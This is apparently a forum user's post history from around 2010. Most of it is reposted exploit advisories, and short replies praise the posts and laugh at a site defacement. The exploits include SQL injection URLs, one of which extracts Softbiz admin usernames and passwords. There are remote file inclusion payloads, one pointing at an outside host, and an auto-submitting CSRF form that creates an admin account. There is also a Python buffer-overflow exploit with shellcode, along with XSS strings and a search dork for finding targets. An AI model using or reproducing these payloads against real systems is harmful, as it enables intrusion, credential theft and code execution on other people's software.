ANdreicj
Active Members
Posts: 245
Everything posted by ANdreicj
-
{In The Name Of Allah The Mercifull}

[~] Tybe: suffer from multi SQL !NJECTON Vulnerability
[~] Vendor: phpcityportal.com
[?] Software : PhpCityPortal
[-] pR!CE :
    -PURCHASE 1 LICENSE - $149 each
    -PURCHASE 3 LICENSES - $119 each
    -PURCHASE 5 LICENSES - $99 each
    -PURCHASE 6 OR MORE LICENSES PLEASE CONTACT US FOR PRICING.
[?] author: ((R3d-D3v!L))
[?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY
[?] contact: N/A
[?] Date: 10.MAR.2010
[?] T!ME: 04:15 pm GMT
[?] Home: WwW.xP10.ME

{DEV!L'5 of SYST3M}

SQL Injection:
[*] Err0r C0N50L3:
http://TARGET/P47H/video_show.php?id=SQL
http://TARGET/P47H/spotlight_detail.php?id=SQL
http://TARGET/P47H/real_estate_details.php?id=sql
http://TARGET/P47H/auto_details.php?id=sql
[~] {EV!L EXPLO!T}:
[*]FORb!d3N

Remote File Inclusion:
[*] Err0r C0N50L3:
http://TARGET/P47H/external.php?url=include your fucken evil shell
[~] {EV!L EXPLO!T}:
like: http://server/external.php?url=http://xp10.me

N073: REAL RED DEV!L W@S h3r3 LAMERZ
GAZA !N our hearts !

[~]-----------------------------{((MAGOUSH-87))}---------------------------------------
[~] Greetz tO: dolly & MERNA & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush-1987
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ
[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4
[?]spechial SupP0RT: MY M!ND & dookie2000ca &((OFFsec))
[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t))
[~]spechial FR!ND: 74M3M
[~] !'M 4R48!4N 3XPL0!73R.
[~]{[(D!R 4ll 0R D!E)]};
[~]---------------------------------------------------------------------------------------------
-
[+] ispCP Omega <= 1.0.4 Remote File Include Vulnerability

[+] Site : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com

I'm cr4wl3r member from Inj3ct0r Team

[+] Discovered By: cr4wl3r
[+] Download: http://isp-control.net/
[+] Dork: "Powered by ispCP Omega"

[+] Code in [ispcp-omega-1.0.4/gui/tools/filemanager/skins/mobile/admin1.template.php]
[x] <?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>

[+] PoC: [path]/tools/filemanager/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=[Shell]

[+] Greetz and thanks to:
[!] str0ke [milw0rm.com]
[!] r0073r, 0x1D [inj3ct0r.com]
[!] opt!x hacker [morrocan hacker]
[!] xoron [turkish hacker]
[!] irvian, cyberlog, [sekuritionline.net]
[!] EA ngel, basix, angky_tatoki, doniskaynet, panteto [manadocoding.net]
[!] boom3rang [khg-cr3w.org]
-
=======================================================================
Anantasoft Gazelle CMS CSRF Vulnerability
=======================================================================
by Pratul Agrawal

# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Software Anantasoft_Gazelle_CMS
# Category CMS / Portals
# Platform php

# Proof of concept
# Targeted URL: http://server/demo/2/193/Anantasoft_Gazelle_CMS

Script to add the Admin user through cross-site request forgery:

<html>
<body>
<form name="XYZ" action="http://server/gazelle/admin/index.php?Users/Add%20User" method="post">
<input type=hidden name="name" value="master">
<input type=hidden name="pass" value="master">
<input type=hidden name="controle" value="master">
<input type=hidden name="email" value="master%40yahoo.com">
<input type=hidden name="active" value="on">
<input type=hidden name="showemail" value="on">
<input type=hidden name="admin%5B%5D" value="2">
<input type=hidden name="save" value="Add">
<input type=hidden name="table" value="users">
<input type=hidden name="joindate" value="2010-03-10+04%3A04%3A36">
</form>
<script>
document.XYZ.submit();
</script>
</body>
</html>

After execution, refresh the page and you can see that the user with the given name is added automatically with Admin privilege.

#If you have any questions, comments, or concerns, feel free to contact me.
-
----------------------------Information------------------------------------------------
+Name : Softbiz Jobs & Recruitment Script SQL INJECTION search_result.php
+Author : Easy Laster
+Date : 10.03.2010
+Script : Softbiz Jobs & Recruitment Script
+Price : 129$
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet, Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.
---------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/sbjbs/search_result.php?cid=
+Exploitable : http://www.site.com/sbjbs/search_result.php?cid=9999999+union+select+1
,concat(sb_admin_name,0x3a,sb_pwd),3,4+from+sbjbs_admin#
-----------------------------------------------------------------------------------------
-
#!/usr/bin/env python
#Mini-stream Ripper 3.0.1.1 (.m3u) Buffer Overflow Code Execution
#Software Link: http://www.mini-stream.net/downloads/Mini-streamRipper.exe
#Author: l3D
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com

nops1='\x90'*0x2a80

#system("calc") - Metasploit.com
shellcode=("\xb8\x19\xfc\x3c\x9b\xd9\xc4\x31\xc9\xb1\x32\xd9\x74\x24\xf4"
"\x5b\x83\xeb\xfc\x31\x43\x0e\x03\x5a\xf2\xde\x6e\xa0\xe2\x96"
"\x91\x58\xf3\xc8\x18\xbd\xc2\xda\x7f\xb6\x77\xeb\xf4\x9a\x7b"
"\x80\x59\x0e\x0f\xe4\x75\x21\xb8\x43\xa0\x0c\x39\x62\x6c\xc2"
"\xf9\xe4\x10\x18\x2e\xc7\x29\xd3\x23\x06\x6d\x09\xcb\x5a\x26"
"\x46\x7e\x4b\x43\x1a\x43\x6a\x83\x11\xfb\x14\xa6\xe5\x88\xae"
"\xa9\x35\x20\xa4\xe2\xad\x4a\xe2\xd2\xcc\x9f\xf0\x2f\x87\x94"
"\xc3\xc4\x16\x7d\x1a\x24\x29\x41\xf1\x1b\x86\x4c\x0b\x5b\x20"
"\xaf\x7e\x97\x53\x52\x79\x6c\x2e\x88\x0c\x71\x88\x5b\xb6\x51"
"\x29\x8f\x21\x11\x25\x64\x25\x7d\x29\x7b\xea\xf5\x55\xf0\x0d"
"\xda\xdc\x42\x2a\xfe\x85\x11\x53\xa7\x63\xf7\x6c\xb7\xcb\xa8"
"\xc8\xb3\xf9\xbd\x6b\x9e\x97\x40\xf9\xa4\xde\x43\x01\xa7\x70"
"\x2c\x30\x2c\x1f\x2b\xcd\xe7\x64\xc3\x87\xaa\xcc\x4c\x4e\x3f"
"\x4d\x11\x71\x95\x91\x2c\xf2\x1c\x69\xcb\xea\x54\x6c\x97\xac"
"\x85\x1c\x88\x58\xaa\xb3\xa9\x48\xc9\x52\x3a\x10\x0e")

nops2='\x90'*(0xa9ff-len(nops1+shellcode))
ret='\x30\x3D\x0D'
payload=nops1+shellcode+nops2+ret

evil="""<ASX Version="3.0">
<ENTRY>
<REF HREF="%s"/>
</ENTRY>
</ASX>
""" % payload

bad=open('crash.m3u', 'w')
bad.write(evil)
bad.close()
-
Long live Romania and its crimes!
-
The song is an old one ..
-
Useful, well done.
-
The worst idea ..
-
What is the license?
-
Great haxors .. shame on you, man.
-
How could you not wait for it, +1. P.S.: Sorry for the off-topic.
-
====================================================================
# Author : Palyo34
# Home : www.1923Turk.com
# Script : CMS by MyWorks
# Script site: http://www.myworks.spb.ru/
====================================================================

===[ Exploit ]===

http://server/catalog/good.php?good_id= SQL INJECTION

1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12

Demo:
http://server/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12

===[XSS Vulnerability]===

http://server/catalog/good.php?good_id=

http://server/catalog/good.php?good_id=164<script>alert("XSS")</script>
-
Hacker?! Or hungry?
-
They are nice .. congratulations!
-
Post the damn source ..
-
http://www.jurnalul.ro/stire-sport/site-ul-oficial-al-cfr-timisoara-a-fost-spart-de-hackeri-536889.html
"The action against the site is "claimed" by eXcEsuHk & U Cluj Fans."
Hahaha.
-
Congratulations .. +1 rep